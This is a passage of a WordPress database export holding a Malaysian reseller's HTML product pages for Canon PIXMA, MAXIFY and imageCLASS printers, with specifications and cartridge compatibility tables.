width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS207</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS307</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS5070</p></td><td width=\"208\"><p>CLI-771 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-770 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-770XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS5170</p></td><td width=\"208\"><p>CL-741 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-741XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740/CL-741 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740XL (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA TS8270</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS9170</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS9570</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr></tbody></table>','Canon','','inherit','closed','closed','','1449-revision-v1','','','2019-09-24 16:20:34','2019-09-24 08:20:34','',1449,'https://bintara.com.my/blog/2019/09/24/1449-revision-v1/',0,'revision','',0),(3309,1,'2019-09-24 16:35:18','2019-09-24 08:35:18','<h2>Injet Printers :-</h2>		\n			<h4>PIXMA E560 / E560R</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Advanced Wireless All-In-One with Auto DuplexÂ Printing for Low-Cost Printing</p><p>The Ink Efficient E560 / E560R is designed to give you an affordable wireless printing experience at low running cost of up to 800 pages.</p><p>Available in Black and Red.</p><p>Print, Scan, Copy</p><p>ISO Standard print speed (A4): up to 9.9ipm black / 5.7ipm colour</p><p>Hi-speed USB 2.0, WiFi</p><p>Recommended print volume: 80 - 400 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA E4270</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Compact Wireless All-In-One with Fax and automatic 2-sided printing for Low-Cost Printing</p><p>This compact Office All-In-One features a 20-sheet Auto Document Feeder for productivity and delivers up to 400 pages yield with high-capacity ink cartridges.</p><p>Print, Scan, Copy, Fax</p><p>ISO standard print speed (A4): 8.8ipm black / 4.4ipm colour</p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Wireless Direct</p><p>Recommended print volume: 50 - 200 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA TS9570</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>A3 Wireless Photo Printer with Large 4.3â€ Touch-Screen and Auto Document Feeder</p><p>This A3 wireless compact Photo All-In-One printer combines amazing compactness and a wide range of printing options for the complete home and small office printing experience.</p><p>Print, Scan, Copy</p><p>ISO standard print speed (A4): up to 15.0ipm black / 10.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, wired LAN, memory card slot, wireless/wired LAN PictBridge, Mopria, AirPrint, BLE, Wireless Direct</p><p>Recommended print volume: 80 - 300 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA TS8270</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Wireless Photo All-In-One with Large 4.3â€ Touch-Screen and Auto Duplex Printing</p><p>This advanced wireless Photo All-In-One is beautifully designed with a wide range of printing options for the complete home printing experience.</p><p>Available in Black, Red and White.</p><p>Print, Scan, Copy</p><p>ISO standard print speed (A4): up to 15.0ipm black / 10.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, memory card slot, wireless Pictbridge, Mopria, AirPrint, BLE, Wireless Direct</p><p>Recommended print volume: 30 - 100 pages</p><center></center><center></center><center></center><center></center><center></center><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA G2010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank All-In-One for High Volume Printing</p><p>Designed for high volume printing at low running cost</p><p>Print, Scan &amp; Copy</p><p>ISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour</p><p>Hi-speed USB 2.0</p><p>Recommended print volume: 150 - 1500 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA G4010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank All-In-One for High Volume Printing</p><p>Designed for high volume printing at low running cost.</p><p>Print, Scan, Copy and Fax</p><p>ISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Access Point Mode</p><p>Recommended print volume: 150 - 1500 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA G1010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank Printer for High Volume Printing</p><p>Designed for high volume printing at low running cost</p><p>Print</p><p>ISO Standard print speed (A4): up to 8.8ipm (mono) / 5.0ipm (colour)</p><p>Photo Speed (4 x 6\"): 60sec. (borderless)</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA G3010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/abbc0420f899426c86b9f547f8e0476d_g3010_01.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/abbc0420f899426c86b9f547f8e0476d_g3010_01.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/abbc0420f899426c86b9f547f8e0476d_g3010_01-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank Wireless All-In-One for High Volume Printing</p><p>Designed for high volume printing at low running cost</p><p>Print, Scan &amp; Copy</p><p>ISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, Mopria, Access Point Mode</p><p>Recommended print volume: 150 - 1500 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h3>Laser Printers :-</h3>		\n			<h4>imageCLASS LBP113w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<h4>Compact with wireless connectivity</h4><p>Simple to operate and compact in size, the ideal choice for your printing needs.</p><ul><li>Print</li><li>Print Speed (A4): Up to 22ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>First Print Out Time (A4): Approx. 6.5 sec</li><li>Print resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li><li>Mobile Connectivity.</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS MF269dw</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/14e8362b0db44a5daaf2af034760fc58_MF269dw-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/14e8362b0db44a5daaf2af034760fc58_MF269dw-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/14e8362b0db44a5daaf2af034760fc58_MF269dw-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>The Multifunction printing solution with Duplex Auto Document Feeder (DADF)</strong></p><p>Enjoy greater efficiency. With the duplex auto document feeder, ensure shorter copying and scanning times.</p><ul><li>Print, Scan, Copy, Fax</li><li>Print Speed (A4): Up to 28ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>FPOT: Approx. 5.2 sec</li><li>Max. paper input capacity: 251 sheets</li><li>Print resolution: 1,200 Ã— 1,200 dpi (equivalent)</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS MF266dn</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/f8389aa599cc42db986e698ac364f9fc_MF266dn-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/f8389aa599cc42db986e698ac364f9fc_MF266dn-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/f8389aa599cc42db986e698ac364f9fc_MF266dn-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>The Multifunction printing solution with Mobile Printing and Network</strong></p><p>Featuring Network printing and SEND technology, MF266dn is the productive choice for your business operations.</p><ul><li>Print, Scan, Copy, Fax</li><li>Print Speed (A4): Up to 28ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>FPOT: Approx. 5.2 sec</li><li>Max. paper input capacity: 251 sheets</li><li>Print resolution: 1,200 Ã— 1,200 dpi (equivalent)</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS MF913w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/7583474b04984f42b18e94fe91075ec9_MF913w-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/7583474b04984f42b18e94fe91075ec9_MF913w-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/7583474b04984f42b18e94fe91075ec9_MF913w-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>Compact All-in-One with wireless connectivity, bundled with three toner cartridges</strong></p><p>Simple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.</p><ul><li>Print, Scan, Copy</li><li>Print Speed (A4): Up to 22ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>FPOT: Approx. 6.5 sec</li><li>Max. paper input capacity: Up to 150 sheets</li><li>Print resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS MF113w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>Compact All-in-One with wireless connectivity</strong></p><p>Simple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Equipped with built-in Wi-Fi and access point capability.</p><ul><li>Print, Scan, Copy</li><li>Print Speed (A4): Up to 22ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>FPOT: Approx. 6.5 sec</li><li>Max. paper input capacity: Up to 150 sheets</li><li>Print resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS LBP913w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>Compact with wireless connectivity, bundled with 3 cartridges</strong></p><p>Keep printing simple. The compact size fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.</p><ul><li>Print</li><li>Print Speed (A4): Up to 22ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>First Print Out Time (A4): Approx. 6.5 sec</li><li>Print Resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li><li>Mobile Printing</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS MF525x</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Smarter way to improve office productivity and work efficiency. Equipped with innovative solution in a robust, compact design, the MF525x integrates seamlessly into busy offices and workgroups.</p><ul><li>Print, Scan, Copy, Fax</li><li>Print Speed (A4): Up to 43ppm</li><li>Recommended monthly print volume: 2,000 - 7,500 pages</li><li>FPOT: 6.2secs. (A4)</li><li>Max. paper input capacity: Up to 2,300 sheets</li><li>Print Resolution: Up to 1200 x 1200dpi (equivalent)</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS MF426dw</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>Compact 4-in-1 Black and White Multifunction for the smart business</strong></p><p>With cutting-edge features, the MF426dw is set to boost work productivity in the modern office.</p><ul><li>Print, Scan, Copy, Fax</li><li>Print Speed (A4): Up to 38ppm</li><li>Recommended monthly print volume: 750 - 4,000 pages</li><li>FPOT: 5.5secs. (A4)</li><li>Max. paper input capacity: Up to 900 sheets</li><li>Print Resolution: Up to 1200 x 1200dpi (equivalent)</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h3>Cartridge Printers :-</h3>		\n		<table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>imagePROGRAF PRO-500</p></td><td width=\"208\"><p>Maintenance Cartridge MC-20</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Chroma Optimizer)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Matte Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Photo Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Photo Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Red)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Yellow)</p></td></tr><tr><td width=\"170\"><p>MAXIFY iB4170</p></td><td width=\"208\"><p>PGI-2700 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>MAXIFY MB5070</p></td><td width=\"208\"><p>PGI-2700 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>MAXIFY MB5170</p></td><td width=\"208\"><p>PGI-2700 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>MAXIFY MB5370</p></td><td width=\"208\"><p>PGI-2700 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>MAXIFY MB5470</p></td><td width=\"208\"><p>PGI-2700 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA E3170</p></td><td width=\"208\"><p>CL-57 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-57S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E410</p></td><td width=\"208\"><p>CL-57 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-57S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA E4270</p></td><td width=\"208\"><p>CL-57 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-57S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA 